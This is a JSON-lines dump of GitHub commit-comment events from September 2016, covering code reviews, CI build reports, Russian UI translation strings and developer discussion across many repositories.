{"id":"4522589211","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":18915041,"position":null,"line":null,"path":null,"commit_id":"c0b277d273536f6aab1df67d908ed5e306868b2a","created_at":"2016-09-06T17:02:33Z","updated_at":"2016-09-06T17:02:33Z","body":"Why is the file extension `.es6`!?"}},"created_at":"2016-09-06T17:02:33Z"}
{"id":"4522591013","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18915047,"position":null,"line":null,"path":null,"commit_id":"40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3","created_at":"2016-09-06T17:02:53Z","updated_at":"2016-09-06T17:02:53Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T17:02:53Z"}
{"id":"4522593060","type":"CommitCommentEvent","actor":{"login":"cdata"},"repo":{"name":"JanMiksovsky/iron-menu-behavior"},"payload":{"comment":{"id":18915070,"position":27,"line":105,"path":"iron-menu-behavior.html","commit_id":"12b17ac471afac5b28f97304a535aa593848f7c4","created_at":"2016-09-06T17:03:18Z","updated_at":"2016-09-06T17:03:18Z","body":"One underscore indicates `protected` for us (two indicates `private`). This technically constitutes a breaking API change. If we can verify it's not being overridden in elements we control that depend on this behavior, it's probably fine.. "}},"created_at":"2016-09-06T17:03:18Z"}
{"id":"4522593771","type":"CommitCommentEvent","actor":{"login":"llvtt"},"repo":{"name":"imranhassan009/mongo-hadoop"},"payload":{"comment":{"id":18915075,"position":null,"line":null,"path":null,"commit_id":"4507e570f3aa701213f19cf745c4548bb5ef5d74","created_at":"2016-09-06T17:03:25Z","updated_at":"2016-09-06T17:03:25Z","body":"@imranhassan009, for future reference, the best place to ask about MongoDB projects is at the MongoDB Google Group here: https://groups.google.com/forum/#!forum/mongodb-user.\r\n\r\nPlease find documentation about how to run the examples on [this page](https://github.com/mongodb/mongo-hadoop/wiki#examples). All the examples can be run from the gradle wrapper with `./gradlew <example name>`, for example `./gradlew enronEmails`.\r\n\r\nIf you have any further questions I'll be happy to help! Please post to the Google group and I'll follow up with you there."}},"created_at":"2016-09-06T17:03:25Z"}
{"id":"4522594916","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18915083,"position":null,"line":null,"path":null,"commit_id":"d70ec52d9ff1f1c8fa27c8e9057a821461f9837e","created_at":"2016-09-06T17:03:37Z","updated_at":"2016-09-06T17:03:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 936](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12773&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:35"}},"created_at":"2016-09-06T17:03:37Z"}
{"id":"4522601177","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"LostTeam/lostteam.github.io"},"payload":{"comment":{"id":18915114,"position":null,"line":null,"path":null,"commit_id":"acbc51b2fccd5987cd119e3fe8b93373a9b543b9","created_at":"2016-09-06T17:04:49Z","updated_at":"2016-09-06T17:04:49Z","body":"really...?"}},"created_at":"2016-09-06T17:04:49Z"}
{"id":"4522604735","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915123,"position":176,"line":176,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:05:31Z","updated_at":"2016-09-06T17:05:31Z","body":"+Вы собираетесь удалить\\nобновления для этого приложения:\\n\\n%s"}},"created_at":"2016-09-06T17:05:31Z"}
{"id":"4522606062","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915126,"position":185,"line":185,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:05:45Z","updated_at":"2016-09-06T17:05:45Z","body":"+Вы собираетесь удалить DLC\\nдля этого приложения:\\n\\n%s"}},"created_at":"2016-09-06T17:05:45Z"}
{"id":"4522609186","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915133,"position":202,"line":202,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:06:21Z","updated_at":"2016-09-06T17:06:21Z","body":"+Необходима прошивка 9.6+, ошибка ядра: %016llX"}},"created_at":"2016-09-06T17:06:21Z"}
{"id":"4522610269","type":"CommitCommentEvent","actor":{"login":"EvanMorrison"},"repo":{"name":"EvanMorrison/JavaScript-Exercises"},"payload":{"comment":{"id":18915136,"position":null,"line":null,"path":null,"commit_id":"69f47cc1d81ad03ec2b499a029b46608780d9d6d","created_at":"2016-09-06T17:06:32Z","updated_at":"2016-09-06T17:06:32Z","body":"Manipulates lyrics entered as items in an array"}},"created_at":"2016-09-06T17:06:32Z"}
{"id":"4522611778","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915141,"position":214,"line":214,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:06:50Z","updated_at":"2016-09-06T17:06:50Z","body":"+Ошибка заверения приложения: 0x%08lX"}},"created_at":"2016-09-06T17:06:50Z"}
{"id":"4522612376","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18915142,"position":null,"line":null,"path":null,"commit_id":"945c9e9587e5b58ddef33ecedd4f25662ae0f206","created_at":"2016-09-06T17:06:58Z","updated_at":"2016-09-06T17:06:58Z","body":"i like help in translations. if need send msg and i help"}},"created_at":"2016-09-06T17:06:58Z"}
{"id":"4522612919","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18915143,"position":null,"line":null,"path":null,"commit_id":"4993b9437a73a1c2c4b0bf89412149e4f3ecbfdc","created_at":"2016-09-06T17:07:05Z","updated_at":"2016-09-06T17:07:05Z","body":"Can someone get rid of this [issue](http://realm667.com/index.php/en/kunena/wolfendoom-blade-of-agony/330-c2m1-operaton-ausbruch?start=10#4657) with SpotLight actor? Thanks."}},"created_at":"2016-09-06T17:07:05Z"}
{"id":"4522613039","type":"CommitCommentEvent","actor":{"login":"timjb"},"repo":{"name":"factisresearch/persistent"},"payload":{"comment":{"id":18915144,"position":null,"line":null,"path":null,"commit_id":"a2c2579aaa2adb0613aec5664705e83779d54452","created_at":"2016-09-06T17:07:07Z","updated_at":"2016-09-06T17:07:07Z","body":"Können wir das hier als Pull-Request den Persistent-Leuten geben? Dann müssen wir diesen Branch hier nicht maintainen."}},"created_at":"2016-09-06T17:07:07Z"}
{"id":"4522613745","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915146,"position":266,"line":266,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:07:15Z","updated_at":"2016-09-06T17:07:15Z","body":"+Обновление"}},"created_at":"2016-09-06T17:07:15Z"}
{"id":"4522613952","type":"CommitCommentEvent","actor":{"login":"airend"},"repo":{"name":"Grouper-AOSP/android_device_asus_grouper"},"payload":{"comment":{"id":18915147,"position":null,"line":null,"path":null,"commit_id":"e6e43a0ff419a00b9343a808f38aa82870a4d683","created_at":"2016-09-06T17:07:17Z","updated_at":"2016-09-06T17:07:17Z","body":"Sure, I tend to build everything (AOSP, CM, etc) with TRWP, at least in M, so that's how this change happened. Feel free to remove the whole staging branch since I should keep this internally anyway, and we have proper review now ;-)"}},"created_at":"2016-09-06T17:07:17Z"}
{"id":"4522616116","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915150,"position":386,"line":386,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:07:40Z","updated_at":"2016-09-06T17:07:40Z","body":"+Изменения (%s)"}},"created_at":"2016-09-06T17:07:40Z"}
{"id":"4522616947","type":"CommitCommentEvent","actor":{"login":"havardgulldahl"},"repo":{"name":"havardgulldahl/jottalib"},"payload":{"comment":{"id":18915152,"position":null,"line":null,"path":null,"commit_id":"a02c6ee173df09cb0ddc05e65360f0950b723756","created_at":"2016-09-06T17:07:50Z","updated_at":"2016-09-06T17:07:50Z","body":"4d015e4"}},"created_at":"2016-09-06T17:07:50Z"}
{"id":"4522617003","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18915153,"position":30,"line":71,"path":"app/renderer/src/containers/ResultListContainer.js","commit_id":"2a6c9d2a24ca240671a7de5f4b5c322023f14396","created_at":"2016-09-06T17:07:51Z","updated_at":"2016-09-06T17:07:51Z","body":"How so? It's hard-coded right now since I believe we're displaying 10 items in view and 60px per item in the default theme. We would need to make this inherit the theme's result item height, max results count (where necessary).\r\n\r\n`this.c.c` is also kind of ugly."}},"created_at":"2016-09-06T17:07:51Z"}
{"id":"4522617779","type":"CommitCommentEvent","actor":{"login":"gwulfers88"},"repo":{"name":"Visin1991/AAGameEngine"},"payload":{"comment":{"id":18915154,"position":null,"line":null,"path":null,"commit_id":"21703e4c3e6938ba953882a03592016d72c7d374","created_at":"2016-09-06T17:08:01Z","updated_at":"2016-09-06T17:08:01Z","body":"@Visin1991 New Update:\r\n\r\n![aagameengine opengl 9_6_2016 9_48_44 am](https://cloud.githubusercontent.com/assets/8527435/18282822/99a58b62-7417-11e6-8975-891caf9a1c63.png)\r\n\r\nUsing three different meshes loaded with my OBJ file loader that use three different shaders (simple: only vertex colors, simpleTexture: uses uvs and texture2D but no lighting, simpleLighting: uses uvs for textures, normals for lighting calculations). I was able to fix the normals that I had trouble loading but now I just calculate them since they look better than the other ones. which would be nice to make the pre computed ones work but for now this is it.\r\n\r\nNot much of an improvement, but we can now have multiple shaders for multiple objects and the shaders can be added to the objects and shared to who ever needs them.\r\n\r\nFor some of the architectures for the engine it would benefit us if we do this :\r\n\r\n`IMPORTANT: We should move to a different approach to allocating memory. We should pre-allocate a chunk of memory for our engine to use. This will ensure that we leave CPU power to performing calculations and NOT allocations and de-allocations. Allocating and de-allocating are pretty slow operations and if we can manage to minimize this as much as possible it will make performance a lot better. Another problem with allocating things every where you introduce new points of failure. All we should really need to do is to allocate a pool of memory and grab from it and recycle memory and we will only have to de-allocate it once!!`\r\n\r\nLet me know what you think about this so I can get started on it. I personally use this approach in all of the projects.\r\n\r\nAnother thing we should try to avoid is to use STL library as much as possible and make our own data structures. This will allow us to make sure we are storing only things we need to store and we could make customization as we need it to facilitate look ups.\r\n\r\nLet me know what you are working on from now and then, we are working together after all :).\r\n\r\n- George Wulfers"}},"created_at":"2016-09-06T17:08:01Z"}
{"id":"4522618587","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18915160,"position":null,"line":null,"path":null,"commit_id":"a29f09e94d24fe12d00debfcb6e7830970536114","created_at":"2016-09-06T17:08:12Z","updated_at":"2016-09-06T17:08:12Z","body":"Congrats!"}},"created_at":"2016-09-06T17:08:12Z"}
{"id":"4522620173","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18915163,"position":null,"line":null,"path":null,"commit_id":"40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3","created_at":"2016-09-06T17:08:30Z","updated_at":"2016-09-06T17:08:30Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-06T17:08:30Z"}
{"id":"4522620802","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18915165,"position":null,"line":null,"path":null,"commit_id":"640c4ea3f7c2f498d7cbf2d14a365b399d0c49c0","created_at":"2016-09-06T17:08:38Z","updated_at":"2016-09-06T17:08:38Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#U-bfO2RARzWNjmoDxJ_KBg"}},"created_at":"2016-09-06T17:08:38Z"}
{"id":"4522621462","type":"CommitCommentEvent","actor":{"login":"gitMarky"},"repo":{"name":"Fulgen301/oc_hazard"},"payload":{"comment":{"id":18915166,"position":null,"line":null,"path":null,"commit_id":"6f9993c1ca4bd0eff7fa37506990e39e64a88ff6","created_at":"2016-09-06T17:08:45Z","updated_at":"2016-09-06T17:08:45Z","body":"\nBecause they have no relevance, except for the global modifier.\n\n________________________________\nFrom: Fulgen301 <notifications@github.com>\nSent: Tuesday, September 6, 2016 1:12 PM\nTo: Fulgen301/oc_hazard\nSubject: Re: [Fulgen301/oc_hazard] Merge branch 'experimental' (6f9993c)\n\n\nWhy did you remove the access modifiers?\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/Fulgen301/oc_hazard/commit/6f9993c1ca4bd0eff7fa37506990e39e64a88ff6#commitcomment-18910695>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AG_YJLWb-RhS8WG50G8_u36wXhqK6kQ7ks5qnWaigaJpZM4J10fY>.\n"}},"created_at":"2016-09-06T17:08:45Z"}
{"id":"4522621764","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915168,"position":220,"line":220,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:08:48Z","updated_at":"2016-09-06T17:08:48Z","body":"+Ошибка при завершении установки контента: 0x%08lX\r\n"}},"created_at":"2016-09-06T17:08:48Z"}
{"id":"4522622587","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915170,"position":217,"line":217,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:08:59Z","updated_at":"2016-09-06T17:08:59Z","body":"+Ошибка при завершении установки TMD: 0x%08lX"}},"created_at":"2016-09-06T17:08:59Z"}
{"id":"4522623331","type":"CommitCommentEvent","actor":{"login":"GuangLightman"},"repo":{"name":"CHANGLI0914/LeetCode_G-C"},"payload":{"comment":{"id":18915172,"position":null,"line":null,"path":null,"commit_id":"cc4f0297ba14f11f207bc66e67afb7ba1a93cb15","created_at":"2016-09-06T17:09:09Z","updated_at":"2016-09-06T17:09:09Z","body":"这是O(n^2)的算法能过你不要骗我。。。。。"}},"created_at":"2016-09-06T17:09:09Z"}
{"id":"4522624235","type":"CommitCommentEvent","actor":{"login":"davidakachaos"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18915174,"position":null,"line":null,"path":null,"commit_id":"1e62ec426a1f8cdf616704e713a63f042f9589e2","created_at":"2016-09-06T17:09:18Z","updated_at":"2016-09-06T17:09:18Z","body":"@DBa2016 I get an error with the latest dev, and I think it has to do with this.\r\n```\r\nTraceback (most recent call last):\r\n  File \"pokecli.py\", line 803, in <module>\r\n    main()\r\n  File \"pokecli.py\", line 150, in main\r\n    bot = start_bot(bot, config)\r\n  File \"pokecli.py\", line 108, in start_bot\r\n    initialize_task(bot, config)\r\n  File \"pokecli.py\", line 92, in initialize_task\r\n    tree = TreeConfigBuilder(bot, config.raw_tasks).build()\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/tree_config_builder.py\", line 79, in build\r\n    instance = worker(self.bot, task_config)\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/base_task.py\", line 23, in __init__\r\n    self.initialize()\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/cell_workers/telegram_task.py\", line 21, in initialize\r\n    self.bot.event_manager.add_handler(TelegramHandler(self.bot, self.config))\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/event_handlers/telegram_handler.py\", line 292, in __init__\r\n    initiator = TelegramDBInit(bot.database)\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/event_handlers/telegram_handler.py\", line 264, in __init__\r\n    self.initDBstructure()\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/event_handlers/telegram_handler.py\", line 276, in initDBstructure\r\n    self.initDBobject(objname, db_structure[objname])\r\n  File \"/home/david/Broncode/PokemonGo-Bot/pokemongo_bot/event_handlers/telegram_handler.py\", line 282, in initDBobject\r\n    if len(res) > 0 and res[0] != sql: # object exists and sql not matching\r\nTypeError: object of type 'NoneType' has no len()\r\n```"}},"created_at":"2016-09-06T17:09:18Z"}
{"id":"4522625057","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915176,"position":138,"line":138,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:09:29Z","updated_at":"2016-09-06T17:09:29Z","body":"+Импорт контента...."}},"created_at":"2016-09-06T17:09:29Z"}
{"id":"4522625281","type":"CommitCommentEvent","actor":{"login":"gwulfers88"},"repo":{"name":"Visin1991/AAGameEngine"},"payload":{"comment":{"id":18915180,"position":null,"line":null,"path":null,"commit_id":"21703e4c3e6938ba953882a03592016d72c7d374","created_at":"2016-09-06T17:09:31Z","updated_at":"2016-09-06T17:09:31Z","body":"I think a useful feature of the game engine should be that we should be able to hot-reload shaders!! haha, I think i'll get started on that as well."}},"created_at":"2016-09-06T17:09:31Z"}
{"id":"4522627664","type":"CommitCommentEvent","actor":{"login":"lcz1012"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":18915189,"position":null,"line":null,"path":null,"commit_id":"7445e35d4ebaaf12562e862bf1907432074a2990","created_at":"2016-09-06T17:09:59Z","updated_at":"2016-09-06T17:09:59Z","body":"你这是屏蔽网站还是屏蔽啥呀？"}},"created_at":"2016-09-06T17:09:59Z"}
{"id":"4522629072","type":"CommitCommentEvent","actor":{"login":"Damin72"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18915195,"position":42,"line":42,"path":"res/romfs/lang/ru.lang","commit_id":"ab5747aabc3f7a96a1447de439d25b2f6e661efa","created_at":"2016-09-06T17:10:16Z","updated_at":"2016-09-06T17:10:16Z","body":"+В очереди установки: %s"}},"created_at":"2016-09-06T17:10:16Z"}
{"id":"4522630426","type":"CommitCommentEvent","actor":{"login":"Roach"},"repo":{"name":"slackhq/hubot-slack"},"payload":{"comment":{"id":18915196,"position":8,"line":12,"path":"README.md","commit_id":"6a9e10e8bf72fcf6cd8834c59fde46a00368a1fd","created_at":"2016-09-06T17:10:31Z","updated_at":"2016-09-06T17:10:31Z","body":"Creating a hubot from a directory named \"hubot\" results in a dependency conflict as the bot generator names the bot's package \"hubot\"\r\n> Refusing to install hubot as a dependency of itself"}},"created_at":"2016-09-06T17:10:31Z"}
{"id":"4522637912","type":"CommitCommentEvent","actor":{"login":"kbluescode"},"repo":{"name":"thinkific/ace-rails-ap"},"payload":{"comment":{"id":18915209,"position":3,"line":2,"path":"vendor/assets/javascripts/set_ace_paths.js.erb","commit_id":"5d16b28abf5e8f62f245111687914cffe6c13049","created_at":"2016-09-06T17:11:56Z","updated_at":"2016-09-06T17:11:56Z","body":"@mattapayne - do you need to pass the block? Isn't this the default behavior of sort? http://ruby-doc.org/core-2.3.1/Enumerable.html#method-i-sort"}},"created_at":"2016-09-06T17:11:56Z"}
{"id":"4522637993","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"slapperwan/gh4a"},"payload":{"comment":{"id":18915210,"position":null,"line":null,"path":null,"commit_id":"d08b0c07c8d49275d871c3969956f4228ffd36f0","created_at":"2016-09-06T17:11:57Z","updated_at":"2016-09-06T17:11:57Z","body":"@slapperwan The basic stuff is there. What's missing at the moment and I'd like to add at some point is adding headers containing the file name etc. to the print (currently it's in the HTML title tag only) and allowing to print a full commit diff. Not sure whether we want to release the feature as-is or wait for those additions."}},"created_at":"2016-09-06T17:11:57Z"}
{"id":"4522639135","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18915215,"position":null,"line":null,"path":null,"commit_id":"34768ba1bd6b271a16931d16cdfb4f6c157239ee","created_at":"2016-09-06T17:12:11Z","updated_at":"2016-09-06T17:12:11Z","body":"@MichaelWallace30 \r\nLet me know when you get the pixhawks so we can test. Right now I'm working on the MavLink protocol, CommNode cleanup and maintenance, and message logger."}},"created_at":"2016-09-06T17:12:11Z"}
{"id":"4522639523","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":18915217,"position":5,"line":36,"path":"src/main/java/nl/cerios/cerioscoop/service/GeneralService.java","commit_id":"3bf33189a6ca639dc8cf310271003b70ec434847","created_at":"2016-09-06T17:12:15Z","updated_at":"2016-09-06T17:12:15Z","body":"Why?\r\nWat is het voordeel van deze naamsverandering?\r\nJe hebt een tabel 'movie'. Daarbinnen heb je een veld 'title', en die ga je nu 'movie_title' noemen. Waarom?"}},"created_at":"2016-09-06T17:12:15Z"}
{"id":"4522642141","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18915221,"position":11,"line":11,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/AlertMulticaster.java","commit_id":"9b821e0a31aa516f27bcfae9abf6e8a649c13a83","created_at":"2016-09-06T17:12:43Z","updated_at":"2016-09-06T17:12:43Z","body":"I'm lost with the purpose of this class, it's so weird."}},"created_at":"2016-09-06T17:12:43Z"}
{"id":"4522648733","type":"CommitCommentEvent","actor":{"login":"airend"},"repo":{"name":"airend/proprietary_vendor_lge_hammerhead"},"payload":{"comment":{"id":18915233,"position":null,"line":null,"path":null,"commit_id":"3f3f48ba36337d9495b1f666983ff463d19ee4ad","created_at":"2016-09-06T17:13:52Z","updated_at":"2016-09-06T17:13:52Z","body":"Not sure what to say… It doesn't happen on my own `android-7.0.0_r1` builds, with the device & kernel trees that I have here (`ng-14` branches)."}},"created_at":"2016-09-06T17:13:52Z"}
{"id":"4522649898","type":"CommitCommentEvent","actor":{"login":"archie426"},"repo":{"name":"PocketMine/PocketMine-Android"},"payload":{"comment":{"id":18915235,"position":null,"line":null,"path":null,"commit_id":"4107db3337f0578e442a46191f12481aed798d27","created_at":"2016-09-06T17:14:07Z","updated_at":"2016-09-06T17:14:07Z","body":"Get a file manager.\r\nReplace the .phar with an updated one (to 0.15.6). Download it here: https://www.dropbox.com/s/tbq12l954xm27z8/PocketMine-MP%200.15.6%20or%200.15.4.phar?dl=0"}},"created_at":"2016-09-06T17:14:07Z"}
{"id":"4522655187","type":"CommitCommentEvent","actor":{"login":"kwalrath"},"repo":{"name":"dart-lang/site-www"},"payload":{"comment":{"id":18915247,"position":6,"line":49,"path":"src/_guides/language/analysis-options.md","commit_id":"244ac0fdf4097c324dc4cbb4e57c3281fc3cd24d","created_at":"2016-09-06T17:15:08Z","updated_at":"2016-09-06T17:15:08Z","body":"Why would you ever specify true, since that's the default value?\r\n\r\nI'd expect to see false for both values in this example."}},"created_at":"2016-09-06T17:15:08Z"}
{"id":"4522655268","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18915248,"position":14,"line":0,"path":"truffle/src/main/ruby/core/truffle/cext.rb","commit_id":"21cbec5f8e5c33d3d5b17c4f846d310c8b104f97","created_at":"2016-09-06T17:15:08Z","updated_at":"2016-09-06T17:15:08Z","body":"Ah yes of course - done."}},"created_at":"2016-09-06T17:15:08Z"}
{"id":"4522664444","type":"CommitCommentEvent","actor":{"login":"kwalrath"},"repo":{"name":"dart-lang/site-www"},"payload":{"comment":{"id":18915268,"position":31,"line":124,"path":"src/_guides/language/analysis-options.md","commit_id":"244ac0fdf4097c324dc4cbb4e57c3281fc3cd24d","created_at":"2016-09-06T17:16:52Z","updated_at":"2016-09-06T17:16:52Z","body":"I think of \"enable\" as \"set to true\", so this sounds wrong to me. How about:\r\n\r\nTo disallow both implicit downcasts and implicit dynamic types:"}},"created_at":"2016-09-06T17:16:52Z"}
{"id":"4522666970","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18915274,"position":15,"line":166,"path":"README.md","commit_id":"7a153236df62c9e21dc2597cf23585d0b5a03abd","created_at":"2016-09-06T17:17:21Z","updated_at":"2016-09-06T17:17:21Z","body":"Oh that's good to know!"}},"created_at":"2016-09-06T17:17:21Z"}
{"id":"4522672505","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"gregsymons/di-ruby-lvm-attrib"},"payload":{"comment":{"id":18915283,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"3284d4320f920d1b99a86e996bdab056486fbdd4","created_at":"2016-09-06T17:18:20Z","updated_at":"2016-09-06T17:18:20Z","body":"actually, the #47 wasn't about git submodule. \r\n\r\nit was to improve the existing script to do most of the steps automatically: https://github.com/gregsymons/di-ruby-lvm-attrib/pull/46#issuecomment-224966821\r\nand it has and still has url inside what it pulls. it's not even using the submodule. \r\n\r\nas for the git modules, the commit 9b567c1ad5873ac2c061beb0d918bc11f17b9e69 message explains itself:\r\n- you have added lvm2 submodule to `.git/index`, but never committed the `.gitmodules` part\r\n- so i just added corresponding `.gitmodules` as well"}},"created_at":"2016-09-06T17:18:20Z"}
{"id":"4522677625","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18915294,"position":null,"line":null,"path":null,"commit_id":"f78f51e2a7cbbbfc464e4761b0d70505dd4edb92","created_at":"2016-09-06T17:19:21Z","updated_at":"2016-09-06T17:19:21Z","body":"The funny think about this is the BSD seq man page says\r\n\r\n> When first is larger than last the default incr is -1.\r\n\r\nAnd yet it won't accept a literal -1 as the increment. This is the sort of thing that makes me stare goggle-eyed in disbelief then do a Picard face-palm."}},"created_at":"2016-09-06T17:19:21Z"}
{"id":"4522682335","type":"CommitCommentEvent","actor":{"login":"kwalrath"},"repo":{"name":"dart-lang/site-www"},"payload":{"comment":{"id":18915308,"position":42,"line":133,"path":"src/_guides/language/analysis-options.md","commit_id":"244ac0fdf4097c324dc4cbb4e57c3281fc3cd24d","created_at":"2016-09-06T17:20:18Z","updated_at":"2016-09-06T17:20:18Z","body":"I'd delete this discussion of dartanalyzer, since you don't cover using it elsewhere in this page. (You do mention it and link to it, which is appropriate, but this page isn't about dartanalyzer.)"}},"created_at":"2016-09-06T17:20:18Z"}
{"id":"4522684957","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18915312,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T17:20:48Z","updated_at":"2016-09-06T17:20:48Z","body":"FixCentroidForNonconvex (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2325 of 2333 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 8 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T17:20:48Z"}
